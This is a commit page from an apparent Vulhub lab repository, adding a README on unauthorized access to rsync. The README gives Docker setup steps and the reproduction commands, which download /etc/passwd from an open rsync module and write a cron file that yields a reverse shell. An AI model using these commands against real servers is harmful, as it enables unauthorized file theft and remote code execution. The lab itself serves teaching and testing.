aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details

Browse Source
This commit is contained in:
Aaron
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

50
rsync/common/README.md Normal file
View File

@@ -0,0 +1,50 @@
# Rsync Unauthorized Access
[中文版本(Chinese version)](README.zh-cn.md)
Rsync is a data backup tool for Linux that supports remote file transfer through rsync protocol and ssh protocol. The rsync protocol listens on port 873 by default. If the target has enabled rsync service and hasn't configured ACL or access password, we can read and write files on the target server.
## Environment Setup
Compile and run the rsync server:
```
docker compose build
docker compose up -d
```
After the environment starts, we can access it using the rsync command:
```
rsync rsync://your-ip:873/
```
You can view the list of module names:
![](1.png)
## Vulnerability Reproduction
As shown above, there is a src module. Let's list the files under this module:
```
rsync rsync://your-ip:873/src/
```
![](2.png)
This is a Linux root directory, and we can download any file:
```
rsync -av rsync://your-ip:873/src/etc/passwd ./
```
Or write any file:
```
rsync -av shell rsync://your-ip:873/src/etc/cron.d/shell
```
We wrote a cron task and successfully got a reverse shell:
![](3.png)